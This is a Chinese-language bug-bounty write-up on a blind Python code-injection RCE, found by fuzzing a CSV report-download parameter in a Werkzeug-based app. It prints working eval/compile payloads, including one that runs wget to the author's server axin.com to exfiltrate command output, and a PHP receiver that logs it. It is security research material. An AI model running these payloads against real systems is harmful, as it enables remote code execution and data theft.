如何解析曲折的RCE挖掘分析

簡(jiǎn)單記錄一下這個(gè)漏洞，沒(méi)啥特殊的手法，就是細(xì)心與fuzz

目標(biāo)應(yīng)用有一個(gè)下載文件的功能，你可以以csv格式下載報(bào)告

 

抓包結(jié)果如下：

 

看起來(lái)好像沒(méi)啥問(wèn)題，但是響應(yīng)中的Werkzaug與python吸引了我的注意，不了解Werkzaug的可以去看一下

我嘗試著用一些其他的payload替換了params參數(shù)的值，都是報(bào)錯(cuò)，看起來(lái)真就沒(méi)啥問(wèn)題，我都準(zhǔn)備不看這個(gè)點(diǎn)了，但是，當(dāng)我用空參數(shù)的時(shí)候，服務(wù)器返回了500錯(cuò)誤

 

這說(shuō)明這個(gè)參數(shù)還是會(huì)影響服務(wù)器的運(yùn)行的嘛（當(dāng)然也不一定，這里只是我的一個(gè)猜測(cè)），為了進(jìn)一步確定，我開(kāi)始fuzz這個(gè)參數(shù)

最后把各種報(bào)錯(cuò)整理了一下，發(fā)現(xiàn)所有和python相關(guān)的payload都報(bào)了500錯(cuò)誤????

看起來(lái)有戲，于是把python rce的payload進(jìn)行了一下url編碼，

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功執(zhí)行，服務(wù)器產(chǎn)生了延時(shí)：

 

由于數(shù)據(jù)不會(huì)回顯，我們就只有用其他手法來(lái)外帶數(shù)據(jù)了，還記得上一篇文章的內(nèi)容嗎？

沒(méi)有看上一篇文章的快回頭去瞅瞅????

構(gòu)造payload:

eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我們的服務(wù)器axin.com上部署一份shell.php文件，文件內(nèi)容如下：

<?php
$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>

發(fā)送payload,并查看POC.txt文件的內(nèi)容：

 

nice的不得了，當(dāng)然，也可以直接彈shell